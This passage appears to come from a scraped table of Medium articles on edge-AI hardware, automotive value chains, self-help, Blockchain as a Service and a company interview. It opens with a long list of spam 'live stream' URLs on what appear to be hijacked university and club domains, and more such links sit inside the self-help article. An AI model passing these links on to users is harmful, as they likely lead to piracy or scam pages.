https://parisfc.fr/bagan/awd/maria-amas-v-awards-red-carpet-hq00.html
https://parisfc.fr/bagan/awd/maria-amas-v-awards-red-carpet-hq01.html
https://parisfc.fr/bagan/awd/maria-amas-v-awards-red-carpet-hq02.html
https://parisfc.fr/bagan/awd/maria-amas-v-awards-red-carpet-hq03.html
https://h2i.utoronto.ca/glu/mara/WWE-Survivor-Series-2020-hd.html
https://h2i.utoronto.ca/glu/mara/WWE-Survivor-Series-2020-hd1.html
https://h2i.utoronto.ca/glu/mara/WWE-Survivor-Series-2020-hd2.html
https://h2i.utoronto.ca/glu/mara/WWE-Survivor-Series-2020-hd3.html
https://ims.utoronto.ca/bagan/mara/WWE-Survivor-Series-2020-hd.html
https://ims.utoronto.ca/bagan/mara/WWE-Survivor-Series-2020-hd1.html
https://ims.utoronto.ca/bagan/mara/WWE-Survivor-Series-2020-hd2.html
https://ims.utoronto.ca/bagan/mara/WWE-Survivor-Series-2020-hd3.html
https://parisfc.fr/bagan/mara/WWE-Survivor-Series-2020-hd.html
https://parisfc.fr/bagan/mara/WWE-Survivor-Series-2020-hd1.html
https://parisfc.fr/bagan/mara/WWE-Survivor-Series-2020-hd2.html
https://parisfc.fr/bagan/mara/WWE-Survivor-Series-2020-hd3.html
https://ims.utoronto.ca/bagan/tak/Khanki-Colts-v-Packers-liv-00.html
https://ims.utoronto.ca/bagan/tak/Khanki-Colts-v-Packers-liv-01.html
https://ims.utoronto.ca/bagan/tak/Khanki-Colts-v-Packers-liv-02.html
https://ims.utoronto.ca/bagan/tak/Khanki-Colts-v-Packers-liv-03.html
https://ims.utoronto.ca/bagan/tak/Khanki-Colts-v-Packers-liv-04.html
https://ims.utoronto.ca/bagan/tak/Khanki-Colts-v-Packers-liv-05.html
https://parisfc.fr/bagan/tak/Khanki-Colts-v-Packers-liv-00.html
https://parisfc.fr/bagan/tak/Khanki-Colts-v-Packers-liv-01.html
https://parisfc.fr/bagan/tak/Khanki-Colts-v-Packers-liv-02.html
https://parisfc.fr/bagan/tak/Khanki-Colts-v-Packers-liv-03.html
https://parisfc.fr/bagan/tak/Khanki-Colts-v-Packers-liv-04.html
https://parisfc.fr/bagan/tak/Khanki-Colts-v-Packers-liv-05.html
https://ims.utoronto.ca/bagan/tak/Magi-Cowboys-v-Vikings-liv-00.html
https://ims.utoronto.ca/bagan/tak/Magi-Cowboys-v-Vikings-liv-01.html
https://ims.utoronto.ca/bagan/tak/Magi-Cowboys-v-Vikings-liv-02.html
https://ims.utoronto.ca/bagan/tak/Magi-Cowboys-v-Vikings-liv-03.html
https://ims.utoronto.ca/bagan/tak/Magi-Cowboys-v-Vikings-liv-04.html
https://ims.utoronto.ca/bagan/tak/Magi-Cowboys-v-Vikings-liv-05.html
https://parisfc.fr/bagan/tak/Magi-Cowboys-v-Vikings-liv-00.html
https://parisfc.fr/bagan/tak/Magi-Cowboys-v-Vikings-liv-01.html
https://parisfc.fr/bagan/tak/Magi-Cowboys-v-Vikings-liv-02.html
https://parisfc.fr/bagan/tak/Magi-Cowboys-v-Vikings-liv-03.html
https://parisfc.fr/bagan/tak/Magi-Cowboys-v-Vikings-liv-04.html
https://parisfc.fr/bagan/tak/Magi-Cowboys-v-Vikings-liv-05.html
https://ims.utoronto.ca/bagan/tak/Mara-Chargers-v-Jets-liv-00.html
https://ims.utoronto.ca/bagan/tak/Mara-Chargers-v-Jets-liv-01.html
https://ims.utoronto.ca/bagan/tak/Mara-Chargers-v-Jets-liv-02.html
https://ims.utoronto.ca/bagan/tak/Mara-Chargers-v-Jets-liv-03.html
https://ims.utoronto.ca/bagan/tak/Mara-Chargers-v-Jets-liv-04.html
https://ims.utoronto.ca/bagan/tak/Mara-Chargers-v-Jets-liv-05.html
https://parisfc.fr/bagan/tak/Mara-Chargers-v-Jets-liv-00.html
https://parisfc.fr/bagan/tak/Mara-Chargers-v-Jets-liv-01.html
https://parisfc.fr/bagan/tak/Mara-Chargers-v-Jets-liv-02.html
https://parisfc.fr/bagan/tak/Mara-Chargers-v-Jets-liv-03.html
https://parisfc.fr/bagan/tak/Mara-Chargers-v-Jets-liv-04.html
https://parisfc.fr/bagan/tak/Mara-Chargers-v-Jets-liv-05.html
https://ims.utoronto.ca/bagan/tak/Kha-Broncos-v-Dolphins-liv-00.html
https://ims.utoronto.ca/bagan/tak/Kha-Broncos-v-Dolphins-liv-01.html
https://ims.utoronto.ca/bagan/tak/Kha-Broncos-v-Dolphins-liv-02.html
https://ims.utoronto.ca/bagan/tak/Kha-Broncos-v-Dolphins-liv-03.html
https://ims.utoronto.ca/bagan/tak/Kha-Broncos-v-Dolphins-liv-04.html
https://ims.utoronto.ca/bagan/tak/Kha-Broncos-v-Dolphins-liv-05.html
https://parisfc.fr/bagan/tak/Kha-Broncos-v-Dolphins-liv-00.html
https://parisfc.fr/bagan/tak/Kha-Broncos-v-Dolphins-liv-01.html
https://parisfc.fr/bagan/tak/Kha-Broncos-v-Dolphins-liv-02.html
https://parisfc.fr/bagan/tak/Kha-Broncos-v-Dolphins-liv-03.html
https://parisfc.fr/bagan/tak/Kha-Broncos-v-Dolphins-liv-04.html
https://parisfc.fr/bagan/tak/Kha-Broncos-v-Dolphins-liv-05.html
https://h2i.utoronto.ca/glu/tak/Khanki-Colts-v-Packers-liv-00.html
https://h2i.utoronto.ca/glu/tak/Khanki-Colts-v-Packers-liv-01.html
https://h2i.utoronto.ca/glu/tak/Khanki-Colts-v-Packers-liv-02.html
https://h2i.utoronto.ca/glu/tak/Khanki-Colts-v-Packers-liv-03.html
https://h2i.utoronto.ca/glu/tak/Khanki-Colts-v-Packers-liv-04.html
https://h2i.utoronto.ca/glu/tak/Khanki-Colts-v-Packers-liv-05.html
https://h2i.utoronto.ca/glu/tak/Magi-Cowboys-v-Vikings-liv-00.html
https://h2i.utoronto.ca/glu/tak/Magi-Cowboys-v-Vikings-liv-01.html
https://h2i.utoronto.ca/glu/tak/Magi-Cowboys-v-Vikings-liv-02.html
https://h2i.utoronto.ca/glu/tak/Magi-Cowboys-v-Vikings-liv-03.html
https://h2i.utoronto.ca/glu/tak/Magi-Cowboys-v-Vikings-liv-04.html
https://h2i.utoronto.ca/glu/tak/Magi-Cowboys-v-Vikings-liv-05.html
https://h2i.utoronto.ca/glu/tak/Mara-Chargers-v-Jets-liv-00.html
https://h2i.utoronto.ca/glu/tak/Mara-Chargers-v-Jets-liv-01.html
https://h2i.utoronto.ca/glu/tak/Mara-Chargers-v-Jets-liv-02.html
https://h2i.utoronto.ca/glu/tak/Mara-Chargers-v-Jets-liv-03.html
https://h2i.utoronto.ca/glu/tak/Mara-Chargers-v-Jets-liv-04.html
https://h2i.utoronto.ca/glu/tak/Mara-Chargers-v-Jets-liv-05.html
https://h2i.utoronto.ca/glu/tak/Kha-Broncos-v-Dolphins-liv-00.html
https://h2i.utoronto.ca/glu/tak/Kha-Broncos-v-Dolphins-liv-01.html
https://h2i.utoronto.ca/glu/tak/Kha-Broncos-v-Dolphins-liv-02.html
https://h2i.utoronto.ca/glu/tak/Kha-Broncos-v-Dolphins-liv-03.html
https://h2i.utoronto.ca/glu/tak/Kha-Broncos-v-Dolphins-liv-04.html
https://h2i.utoronto.ca/glu/tak/Kha-Broncos-v-Dolphins-liv-05.html
https://h2i.utoronto.ca/glu/awd/Am-Music-Awards-2020-00.html
https://h2i.utoronto.ca/glu/awd/Am-Music-Awards-2020-01.html
https://h2i.utoronto.ca/glu/awd/Am-Music-Awards-2020-02.html
https://h2i.utoronto.ca/glu/awd/Am-Music-Awards-2020-03.html
https://h2i.utoronto.ca/glu/awd/Am-Music-Awards-2020-04.html
https://h2i.utoronto.ca/glu/awd/Am-Music-Awards-2020-05.html
https://h2i.utoronto.ca/glu/awd/Am-Music-Awards-2020-06.html
https://h2i.utoronto.ca/glu/awd/Am-Music-Awards-2020-07.html
https://h2i.utoronto.ca/glu/awd/Am-Music-Awards-2020-08.html
https://h2i.utoronto.ca/glu/awd/Am-Music-Awards-2020-09.html
https://ims.utoronto.ca/bagan/awd/Am-Music-Awards-2020-00.html
https://ims.utoronto.ca/bagan/awd/Am-Music-Awards-2020-01.html
https://ims.utoronto.ca/bagan/awd/Am-Music-Awards-2020-02.html
https://ims.utoronto.ca/bagan/awd/Am-Music-Awards-2020-03.html
https://ims.utoronto.ca/bagan/awd/Am-Music-Awards-2020-04.html
https://ims.utoronto.ca/bagan/awd/Am-Music-Awards-2020-05.html
https://ims.utoronto.ca/bagan/awd/Am-Music-Awards-2020-06.html
https://ims.utoronto.ca/bagan/awd/Am-Music-Awards-2020-07.html
https://ims.utoronto.ca/bagan/awd/Am-Music-Awards-2020-08.html
https://ims.utoronto.ca/bagan/awd/Am-Music-Awards-2020-09.html
https://parisfc.fr/bagan/awd/Am-Music-Awards-2020-00.html
https://parisfc.fr/bagan/awd/Am-Music-Awards-2020-01.html
https://parisfc.fr/bagan/awd/Am-Music-Awards-2020-02.html
https://parisfc.fr/bagan/awd/Am-Music-Awards-2020-03.html
https://parisfc.fr/bagan/awd/Am-Music-Awards-2020-04.html
https://parisfc.fr/bagan/awd/Am-Music-Awards-2020-05.html
https://parisfc.fr/bagan/awd/Am-Music-Awards-2020-06.html
https://parisfc.fr/bagan/awd/Am-Music-Awards-2020-07.html
https://parisfc.fr/bagan/awd/Am-Music-Awards-2020-08.html
https://parisfc.fr/bagan/awd/Am-Music-Awards-2020-09.html
https://parisfc.fr/bagan/tak/C-v-V-n-g-01.html
https://parisfc.fr/bagan/tak/C-v-V-n-g-02.html
https://parisfc.fr/bagan/tak/C-v-V-n-g-03.html
https://parisfc.fr/bagan/tak/C-v-V-n-g-04.html
https://parisfc.fr/bagan/tak/C-v-V-n-g-05.html
https://parisfc.fr/bagan/tak/C-v-V-n-g-06.html
https://parisfc.fr/bagan/tak/dolph-bron-uh-01.html
https://parisfc.fr/bagan/tak/dolph-bron-uh-02.html
https://parisfc.fr/bagan/tak/dolph-bron-uh-03.html
https://parisfc.fr/bagan/tak/dolph-bron-uh-04.html
https://parisfc.fr/bagan/tak/dolph-bron-uh-05.html
https://parisfc.fr/bagan/tak/dolph-bron-uh-06.html
https://parisfc.fr/bagan/tak/dolph-bron-uh-07.html
https://parisfc.fr/bagan/tak/dolph-bron-uh-08.html
https://ims.utoronto.ca/bagan/tak/C-v-V-n-g-01.html
https://ims.utoronto.ca/bagan/tak/C-v-V-n-g-02.html
https://ims.utoronto.ca/bagan/tak/C-v-V-n-g-03.html
https://ims.utoronto.ca/bagan/tak/C-v-V-n-g-04.html
https://ims.utoronto.ca/bagan/tak/C-v-V-n-g-05.html
https://ims.utoronto.ca/bagan/tak/C-v-V-n-g-06.html
https://ims.utoronto.ca/bagan/tak/dolph-bron-uh-01.html
https://ims.utoronto.ca/bagan/tak/dolph-bron-uh-02.html
https://ims.utoronto.ca/bagan/tak/dolph-bron-uh-03.html
https://ims.utoronto.ca/bagan/tak/dolph-bron-uh-04.html
https://ims.utoronto.ca/bagan/tak/dolph-bron-uh-05.html
https://ims.utoronto.ca/bagan/tak/dolph-bron-uh-06.html
https://ims.utoronto.ca/bagan/tak/dolph-bron-uh-07.html
https://ims.utoronto.ca/bagan/tak/dolph-bron-uh-08.html
https://parisfc.fr/bagan/tak/Colt-v-Packe-g-u-a-01.html
https://parisfc.fr/bagan/tak/Colt-v-Packe-g-u-a-02.html
https://parisfc.fr/bagan/tak/Colt-v-Packe-g-u-a-03.html
https://parisfc.fr/bagan/tak/Colt-v-Packe-g-u-a-04.html
https://parisfc.fr/bagan/tak/Colt-v-Packe-g-u-a-05.html
https://ims.utoronto.ca/bagan/tak/Colt-v-Packe-g-u-a-01.html
https://ims.utoronto.ca/bagan/tak/Colt-v-Packe-g-u-a-02.html
https://ims.utoronto.ca/bagan/tak/Colt-v-Packe-g-u-a-03.html
https://ims.utoronto.ca/bagan/tak/Colt-v-Packe-g-u-a-04.html
https://ims.utoronto.ca/bagan/tak/Colt-v-Packe-g-u-a-05.html
The debut of the Raspberry Pi in 2012 was a watershed moment for computing because it made computers accessible in a tiny, all-in-one package, for just $35. It meant that hobbyists like me could buy a full computer and hack around with ideas, like building a magic mirror or DIY smart screen. Before the Raspberry Pi, there were few ways to tinker on these kinds of ideas without investing hundreds of dollars in specialized hardware or cannibalizing an old laptop for the job.
Cheap, integrated computers like the Jetson and Google’s “Coral” development board are poised to do the same for A.I. Oversimplifying it, A.I. (which is often referred to as machine learning) is basically processing vast quantities of data to “teach” a computer to find a pattern in that data. Doing so relies on GPUs, which are adept at processing large sets of data quickly and creating inferences.
The problem, until recently, has been that the GPUs required to perform machine learning tasks are expensive, large, and require building an entire computer. That meant that those interested in the field generally had a choice: build a powerful desktop computer, or pay Google, Amazon, or Microsoft for their cloud platforms to do it for you.
While these cloud platforms are useful, the raw processing power required for A.I. meant that it was difficult to build in smarts to home devices without depending on an internet connection to send data to that cloud. Ring’s smart doorbells, for example, perform facial recognition in the cloud because there’s historically been no reasonable, affordable way to put the smarts required into a device that’s glued to your door.
Nvidia’s Jetson computer, and others like it, change the game by making tiny, powerful chips that let people access the power of A.I. without needing to rely on the power of the cloud. Instead of building a smart doorbell that relies on a cloud server to perform facial recognition, Jetson makes it simple to run that algorithm locally, without sending data to the cloud for processing. Want to build a self-driving robot that doesn’t crash into objects for under $100? That’s now a reality.
Cheap A.I.-enabled computers level the playing field.
This is an enormous leap because it means it’s now possible to build privacy-first smart devices that don’t rely on the cloud to crunch petabytes of your personal data in order to be useful. It would allow device makers like Roomba, for example, to build vacuum cleaners that learn about your home’s layout without sending that data to the cloud, or companies like Ubiquiti to build smart doorbells that detect faces in footage without sending it outside your home. More importantly, it allows you to do the same without spending thousands of dollars.
The process of crunching this data on-device is referred to as “Edge” A.I., which means that the processing is done near the source of data. While this technology has been used in smartphones in recent years for things like processing “Hey Siri” on the iPhone and Google’s Call Screen technology, it hasn’t been as common in other smart devices because it’s cheaper to just fire that data off to the cloud than to include an expensive custom chip to process information locally. That comes at the cost of your privacy — and a reliance on the company keeping those servers online so your device continues to function.
Dependence on the cloud gives companies like Ring, which is owned by Amazon, an advantage over any new entrants to the space because it has access to practically unlimited resources from its parent company to build A.I.-enabled devices for free. Cheap A.I.-enabled computers level the playing field: Anyone can now play with fully fledged A.I. for a onetime cost of $59 and build devices that compete with the industry’s giants without paying endless cash to the cloud platforms to get access to the smarts they require.
More importantly, devices like Jetson open the floodgates for a new generation to play around with their A.I.-powered ideas at home, building their own voice assistants or self-flying drones without requiring an internet connection or an expensive investment in high-end hardware.
Like the Raspberry Pi leveled the playing field for hobbyists and students a few short years ago, Nvidia’s new Jetson computer will usher in a new wave of A.I.-based projects that anyone can build for themselves simply because it’s so accessible — and some of those ideas might turn into the next big thing. | https://medium.com/@rapnibijce3682/this-59-a-i-kit-could-change-how-you-think-about-smart-devices-forever-e918e45a2480 | ['Rapni Bijce'] | 2020-11-22 22:29:44.062000+00:00 | ['Artificial Intelligence', 'Computing', 'Technology', 'Smart Home', 'Gadgets'] |
196 | How is the automotive value chain ‘stacking up’? | Exponential growth in technology is impacting the Automotive industry.
What do we mean by ‘exponential growth in technology’?
Three exponential laws:
Moore’s law: Every 18 months, your computer will have twice as much power to process information.
Every 18 months, your computer will have twice as much power to Butters’ law: The amount of data communicated through a single optical fiber doubles every nine months.
The amount of through a single optical fiber doubles every nine months. Kryder’s law: The amount of data stored per centimeter square of a hard drive will double every 16 or 17 months.
Click here to check out some visual references of these laws.
What does this mean for the automotive industry?
More than 40% of a vehicle’s architecture is now electronics, featuring over 100 million lines of code. This is set to rise to 300 million by 2030. Cars in the 1980s had only 50K lines of code which gives you an indication of how times are changing.
As technology has developed and large incumbent organizations have failed to adapt, new market players have been able to enter and disrupt industries such as automotive with new consumer offerings.
Traditional value chains and vertical integration:
Value chains are the organisation of entities in a market that create and deliver value to consumers.
Typically, automotive competitors have aimed towards vertically integrating their value chains.
Vertical integration is a strategy where a company:
Owns or controls its suppliers, distributors or retail locations to control its value creation and delivery across multiple steps in the supply chain.
across multiple steps in the supply chain. In the past, vertical integration has allowed companies to control processes and drive down costs in predictable market situations.
market situations. Example: Hyundai is an organisation with a typically vertically integrated or closed value chain, owning or controlling parts of their end-to-end chain.
Simplified example of an automotive value chain:
[Image below] Players in a traditional value chain and digital-first entrants that are making an impact.
‘Stacking’ of the value chain:
Technology is enabling deconstruction of the traditional automotive value chain into a stack structure.
Digital-first companies have the ability to offer new, high-tech products and services across the value chain faster than traditional OEM’s.
What might a stack based value chain look like? | https://medium.com/@ben-davies/how-is-the-automotive-value-chain-stacking-up-b7c4298dfc21 | ['Ben Davies'] | 2020-12-15 14:49:57.080000+00:00 | ['Technology', 'Cars', 'Automotive', 'Future', 'Disruption'] |
197 | If all you do is follow the exact same routine every day, you will never leave yourself open to moments of sudden discovery. Do you remember how | Life is a journey of twists and turns, peaks and valleys, mountains to climb and oceans to explore.
Good times and bad times. Happy times and sad times.
But always, life is a movement forward.
No matter where you are on the journey, in some way, you are continuing on — and that’s what makes it so magnificent. One day, you’re questioning what on earth will ever make you feel happy and fulfilled. And the next, you’re perfectly in flow, writing the most important book of your entire career.
https://www.deviantart.com/ncflive/commission/FREE-Ram-R-Salisbury-J-vs-Krawietz-K-Mies-A-Live-Stream-Free-1410812
https://www.deviantart.com/ncflive/commission/STREAMING-Krawietz-K-Mies-A-vs-Ram-R-Salisbury-J-Live-Stream-Fr-1410814
https://www.deviantart.com/ncflive/commission/LIVE-Krawietz-K-Mies-A-vs-Ram-R-Salisbury-J-Live-Stream-1410816
https://www.deviantart.com/ncflive/commission/Watch-Ram-R-Salisbury-J-vs-Krawietz-K-Mies-A-Live-Stream-free-1410817
https://www.deviantart.com/ncflive/commission/StreamS-watch-Krawietz-K-Mies-A-vs-Ram-R-Salisbury-J-Live-Stre-1410818
What nobody ever tells you, though, when you are a wide-eyed child, are all the little things that come along with “growing up.”
1. Most people are scared of using their imagination.
They’ve disconnected with their inner child.
They don’t feel they are “creative.”
They like things “just the way they are.”
2. Your dream doesn’t really matter to anyone else.
Some people might take interest. Some may support you in your quest. But at the end of the day, nobody cares, or will ever care about your dream as much as you.
3. Friends are relative to where you are in your life.
Most friends only stay for a period of time — usually in reference to your current interest. But when you move on, or your priorities change, so too do the majority of your friends.
4. Your potential increases with age.
As people get older, they tend to think that they can do less and less — when in reality, they should be able to do more and more, because they have had time to soak up more knowledge. Being great at something is a daily habit. You aren’t just “born” that way.
5. Spontaneity is the sister of creativity.
If all you do is follow the exact same routine every day, you will never leave yourself open to moments of sudden discovery. Do you remember how spontaneous you were as a child? Anything could happen, at any moment!
6. You forget the value of “touch” later on.
When was the last time you played in the rain?
When was the last time you sat on a sidewalk and looked closely at the cracks, the rocks, the dirt, the one weed growing between the concrete and the grass nearby.
Do that again.
You will feel so connected to the playfulness of life.
7. Most people don’t do what they love.
It’s true.
The “masses” are not the ones who live the lives they dreamed of living. And the reason is because they didn’t fight hard enough. They didn’t make it happen for themselves. And the older you get, and the more you look around, the easier it becomes to believe that you’ll end up the same.
Don’t fall for the trap.
8. Many stop reading after college.
Ask anyone you know the last good book they read, and I’ll bet most of them respond with, “Wow, I haven’t read a book in a long time.”
9. People talk more than they listen.
There is nothing more ridiculous to me than hearing two people talk “at” each other, neither one listening, but waiting for the other person to stop talking so they can start up again.
10. Creativity takes practice.
It’s funny how much we as a society praise and value creativity, and yet seem to do as much as we can to prohibit and control creative expression unless it is in some way profitable.
If you want to keep your creative muscle pumped and active, you have to practice it on your own.
11. “Success” is a relative term.
As kids, we’re taught to “reach for success.”
What does that really mean? Success to one person could mean the opposite for someone else.
Define your own Success.
12. You can’t change your parents.
A sad and difficult truth to face as you get older: You can’t change your parents.
They are who they are.
Whether they approve of what you do or not, at some point, no longer matters. Love them for bringing you into this world, and leave the rest at the door.
13. The only person you have to face in the morning is yourself.
When you’re younger, it feels like you have to please the entire world.
You don’t.
Do what makes you happy, and create the life you want to live for yourself. You’ll see someone you truly love staring back at you every morning if you can do that.
14. Nothing feels as good as something you do from the heart.
No amount of money or achievement or external validation will ever take the place of what you do out of pure love.
Follow your heart, and the rest will follow.
15. Your potential is directly correlated to how well you know yourself.
Those who know themselves and maximize their strengths are the ones who go where they want to go.
Those who don’t know themselves, and avoid the hard work of looking inward, live life by default. They lack the ability to create for themselves their own future.
16. Everyone who doubts you will always come back around.
That kid who used to bully you will come asking for a job.
The girl who didn’t want to date you will call you back once she sees where you’re headed. It always happens that way.
Just focus on you, stay true to what you believe in, and all the doubters will eventually come asking for help.
17. You are a reflection of the 5 people you spend the most time with.
Nobody creates themselves, by themselves.
We are all mirror images, sculpted through the reflections we see in other people. This isn’t a game you play by yourself. Work to be surrounded by those you wish to be like, and in time, you too will carry the very things you admire in them.
18. Beliefs are relative to what you pursue.
Wherever you are in life, and based on who is around you, and based on your current aspirations, those are the things that shape your beliefs.
Nobody explains, though, that “beliefs” then are not “fixed.” There is no “right and wrong.” It is all relative.
Find what works for you.
19. Anything can be a vice.
Be wary.
Again, there is no “right” and “wrong” as you get older. A coping mechanism to one could be a way to relax on a Sunday to another. Just remain aware of your habits and how you spend your time, and what habits start to increase in frequency — and then question where they are coming from in you and why you feel compelled to repeat them.
Never mistakes, always lessons.
As I said, know yourself.
20. Your purpose is to be YOU.
What is the meaning of life?
To be you, all of you, always, in everything you do — whatever that means to you. You are your own creator. You are your own evolving masterpiece.
Growing up is the realization that you are both the sculpture and the sculptor, the painter and the portrait. Paint yourself however you wish. | https://medium.com/@ramrsalisburyjvskrawietliveon/if-all-you-do-is-follow-the-exact-same-routine-every-day-you-will-never-leave-yourself-open-to-2de44265c12f | ['Ram R', 'Salisbury J Vs Krawietz K', 'Mies A Live Tv'] | 2020-11-19 17:24:15.769000+00:00 | ['Technology', 'Sports', 'Social Media', 'News', 'Live Streaming'] |
198 | Blockchain as a Service (BaaS) | What is BaaS?
Baas is based on the Software as a Service (SaaS) model and works in a similar fashion.
BaaS refers to third-party cloud-based infrastructure and management for companies building and operating blockchain apps.
It functions like a sort of web host, running the back-end operation for a block-chain based app or platform.
Why BaaS?
-Consumers and businesses are increasingly willing to adapt to blockchain technology.
-However, the technical complexities and operational overhead involved often act as a barrier.
-These include creating, configuring, and operating a blockchain and maintaining its infrastructure
How does BaaS do it?
-BaaS offers an external service provider to set up all the necessary blockchain technology and infrastructure for a fee.
-Once created, the provider continues to handle the complex back-end operations for the client.
-These include activities like bandwidth management, allocation of resources, hosting requirements, and data security features.
-The BaaS operator frees the client to focus on the core job, the functionality of the blockchain.
-A BaaS provider’s role is similar to that of a web hosting provider.
-The website creators create and run all the website content on their own personal computers.
-They may hire support staff or sign up with an external hosting provider like Amazon Web Services or HostGator.
-Similarly, these third-party companies take care of the infrastructure and maintenance issues.
The Future
-BaaS may be the catalyst that leads to a wider and deeper penetration of blockchain technology across various industries and businesses.
-Businesses don’t have to create and run their own blockchains.
-Instead they can now simply outsource the technically complex work and focus on its core activities.
Thank You For Reading | https://medium.com/@blockchainx-tech/blockchain-as-a-service-baas-fc470c02bb2b | [] | 2020-12-22 11:13:38.944000+00:00 | ['Blockchain', 'Blockchain Development', 'Blockchain Technology', 'Blockchain Startup'] |
199 | Fireside Chats at KI labs; ep. 18 | In this episode, we talk with our newly joined Data Engineering Lead, Ahmad Alhour, about his path from Jordan to Greece, and finally, to Munich!
Where did things start for you?
I was born in Amman Jordan, the middle east. So that’s a very big city, almost twice as big as Berlin. During my life growing up, Jordan was fairly peaceful. The oil and gas prices were impacted by the political issues around us but luckily we never had to worry about violence.
The bigger problem is how centralised the country is. About half the population lives in the capital city. The government is trying to change that by building universities in small cities so that cities can expand around the services demanded by the university.
I very much enjoy going back to visit family once or twice a year but each time I go back, I realise why I left in the first place.
How did you get into technology?
I fell in love with computers and programming when my dad bought a Pentium 1 PC around 2001–2002. I didn’t know what it was but I wanted to operate it. For my birthday, he gifted me Visual Basic Studio with a book on programming. I tried to hack a calculator and after messing around for a few months, I decided I wanted to be a programmer and it became my hobby. Graduating high school allowed me to immediately choose software engineering as an area of study.
In university I was approached by a few guys who were graduating about an idea for starting a social network; but in Arabic (this was right when Facebook was getting big). They asked me if I’d like to join them part time and I worked with them for a little bit over 2 years.
That’s where I actually learned software engineering professionally — which is much different than academic software engineering. I was very excited about visual programming and so getting into the web was sort of like a ‘dark art’ for me. I took electives in university to get better in that area so I could help the guys build the social network.
After graduating, I worked at a different startup for more than a year but then moved to Greece as an R&D Engineer for a large corporation, which was exciting. I definitely learned a lot but I learned that I wanted to do something solely with software. Then I moved to Germany.
Why did you choose Greece?
I didn’t really decide Greece as opposed to any other country. A recruiter offered me the opportunity and I saw it as a ticket into Europe. I talked with a few friends who told me Greece was a beautiful country from their holidays, so I was sold. Worst case, I’d just move back if I didn’t like it. Athens actually reminded me a lot of Amman. I expected something like London or Munich but it’s more southeastern European than Northwestern. Luckily, the food is amazing and the summers are fantastic.
How did you get to Germany?
I made the decision myself this time. The company in Athens wasn’t doing so well, and Greece as a country wasn’t either. Greece was considering leaving the EU and I had no interest in that. I wanted to move to Central Europe because tech was growing and that’s where my career could start developing. In Greece, the work atmosphere was more like, “hey let’s go to the beach, let’s grab a drink,” rather than working on an interesting project. There aren’t many Meetups or Conferences, and if there was any, it would be in Greek. I had to learn Greek as quick as possible because nearly everyone in the country (that I interacted with) spoke exclusively Greek; greek students only learn English if they take the class in secondary school as an elective.
Jordan is even much more English speaking than Greece. We learn English in primary school so everyone speaks it. There are many International companies in Amman too: Yahoo, Expedia, and Microsoft all have engineering offices. There are also different tech conferences, different open source community groups, etc. When I went to Athens, I expected an upgrade. This was the expectation of a European country. So, for my next move, I wanted my expectation to be met and Germany provided that.
How did web development turn in to data engineering?
In my previous company, my software engineering team wanted to build a report for a previous client. The client wanted to track reviews online to see if they were real or fraudulent. The technology “Spark” was recommended, and we decided to give it a try. We estimated 3 working days for it and I ended up spending two weeks on it. Despite taking too long, I realised I really enjoyed that type of work and eventually I was able to transfer to lead a Data Engineering team. There is so much to be learned and it’s a very new field, so the domain is loosely defined which makes things very interesting.
How does KI labs fit your life and career goals?
The data engineering team here is almost 3 times as big so there are many engineers to learn from. They also have a huge pool of knowledge; as many of them come from very diverse career paths, all coming together at data engineering.
There were three (+1) factors that convinced me to join KI labs. The first was my interview experience. I had great talks with the team. Second, the portfolio of projects the company is getting into and how important data engineering is in winning projects. I want to grow in data engineering, so it aligned well with my own goals.
Also, the office being near the city centre is a huge draw. My commute distance was more than halved which makes a significant difference in the quality of life. I make one tram connection and I’m at the office.
The +1 is because while I was trying to make a decision about joining KI labs or not, I read the Fireside Chat with Shreyas and Alex.
You joined less than two weeks ago. What’s the first impression of working at KI labs?
The onboarding process was very smooth for me. Everything was at my desk and ready for use. The team was welcoming and I’m getting to know them more over lunches. The data team dynamic is somewhat different than a product-company’s data team would be like since some of the engineers are working on projects completely different than other members of the team. Since I am a Lead, this will be an area of focus for me; understanding each team member’s wants and frustrations and trying to improve team cohesion while not restricting the freedom each engineer has. I’m quite excited to see what we’re able to accomplish! | https://medium.com/ki-labs-engineering/fireside-chats-at-ki-labs-ep-18-695066ce8b15 | ['Wyatt Carr'] | 2019-10-14 08:38:09.816000+00:00 | ['Hiring', 'Diversity', 'Technology', 'Data', 'Startup'] |